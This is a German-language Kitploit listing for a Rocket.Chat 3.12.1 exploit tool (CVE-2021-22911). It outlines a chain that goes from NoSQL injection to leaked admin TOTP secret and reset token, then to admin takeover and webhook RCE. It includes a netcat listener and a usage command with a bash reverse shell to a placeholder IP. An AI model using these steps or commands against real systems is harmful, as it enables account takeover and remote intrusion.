Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-22911-RocketChat — Exploit für Rocket.Chat 3.12.1 RCE über Pre-Auth-NoSQL-Injection, der das TOTP-Geheimnis des Administrators und das Passwort-Reset-Token leakt, um Remote-Codeausführung durch bösartige Webhook-Integration zu erreichen. | Kitploit
Tools/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Exploit für Rocket.Chat 3.12.1 RCE über Pre-Auth-NoSQL-Injection, der das TOTP-Geheimnis des Administrators und das Passwort-Reset-Token leakt, um Remote-Codeausführung durch bösartige Webhook-Integration zu erreichen.

Repository anzeigen
22vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (Improvised)

Beschreibung

Nutzt eine Pre-Auth-NoSQL-Injection-Schwachstelle in Rocket.Chat 3.12.1 aus, um das TOTP-Geheimnis des Administrators und das Passwort-Reset-Token zu erlangen, das Admin-Konto zu übernehmen und über eine bösartige Webhook-Integration eine RCE zu erreichen.

Betroffene Version

Rocket.Chat <= 3.12.1

Voraussetzungen

pip install -r requirements.txt

Einrichtung – Zuerst einen Listener starten

Bevor du den Exploit ausführst, starte in einem separaten Terminal einen Netcat-Listener, um die eingehende Reverse-Shell zu empfangen:

root@kitploit:~
nc -lvnp 4444

Lass dieses Terminal geöffnet. Sobald der Exploit erfolgreich läuft, erscheint deine Shell hier.

Verwendung

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Argumente

FlagBeschreibung
-tZiel-Rocket.Chat-URL
-uDein registrierter Benutzername mit niedrigen Rechten
-pDein registriertes Passwort mit niedrigen Rechten
-eE-Mail-Adresse des Administrators
-aBenutzername des Administrators
-cReverse-Shell-Befehl
-vAusführlicher Modus (zeigt rohe Antworten)

Funktionsweise

  1. Authentifiziert sich über das DDP-Protokoll als Benutzer mit niedrigen Rechten
  2. Erlangt das TOTP-Geheimnis des Administrators per NoSQL-$where-Injection
  3. Löst die Passwort-Reset-E-Mail des Administrators aus
  4. Erlangt das Passwort-Reset-Token des Administrators per NoSQL-$where-Injection
  5. Setzt das Admin-Passwort unter Umgehung von 2FA mithilfe des erlangten TOTP-Geheimnisses zurück
  6. Erstellt eine bösartige Webhook-Integration und löst RCE aus

Haftungsausschluss

Dieses Tool dient nur zu Bildungszwecken und für autorisierte Penetrationstests. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Hol vor dem Testen immer eine ordnungsgemäße schriftliche Genehmigung ein.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
Tool herunterladen